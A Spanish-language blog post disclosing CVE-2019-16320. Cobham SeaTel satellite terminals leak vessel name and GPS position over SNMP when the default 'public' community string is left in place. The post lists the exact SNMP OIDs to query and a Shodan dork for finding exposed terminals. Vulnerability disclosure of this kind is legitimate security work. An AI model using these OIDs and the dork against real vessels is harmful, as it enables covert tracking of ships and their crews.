domingo, 1 de septiembre de 2019

[Cobham] Terminales Satelitales SeaTel expone geolocalización de embarcaciones via SNMP (CVE-2019-16320)


Necesitamos solo una "credencial" (el "comunity string") que en el 100% de los casos me he encontrado con el que viene por defecto; "public". 









Parseando output:

 [+] SHIP
     Name: iso.3.6.1.4.1.36431.1.1.1.1.1.0
     Latitude: iso.3.6.1.4.1.36431.1.1.1.1.2.0
     Longitude: iso.3.6.1.4.1.36431.1.1.1.1.3.0


 [+] SATELLITE TERMINAL
     Model: iso.3.6.1.4.1.36431.1.1.1.1.21.0
     Satellite: iso.3.6.1.4.1.36431.1.1.1.1.5.0
     Frecuency: iso.3.6.1.4.1.36431.1.1.1.1.7.0
     Search Pattern: iso.3.6.1.4.1.36431.1.1.1.1.11.0
     Antenna: iso.3.6.1.4.1.36431.1.1.1.1.12.0
     LNB: iso.3.6.1.4.1.36431.1.1.1.1.13.0


 [+] SATELLITE
     Signal: iso.3.6.1.4.1.36431.1.1.1.1.24.0
     Sat Lon: iso.3.6.1.4.1.36431.1.1.1.1.6.0
     Heading: iso.3.6.1.4.1.36431.1.1.1.1.4.0
     Azimuth: iso.3.6.1.4.1.36431.1.1.1.1.18.0
     Elevation: iso.3.6.1.4.1.36431.1.1.1.1.19.0 
     Relative: iso.3.6.1.4.1.36431.1.1.1.1.22.0 


---
tool:




SHODAN, (IDEAL) DORK: 

[+] Dork: "Marine Stabilized Antenna System"







Saludos,


No hay comentarios.:

Publicar un comentario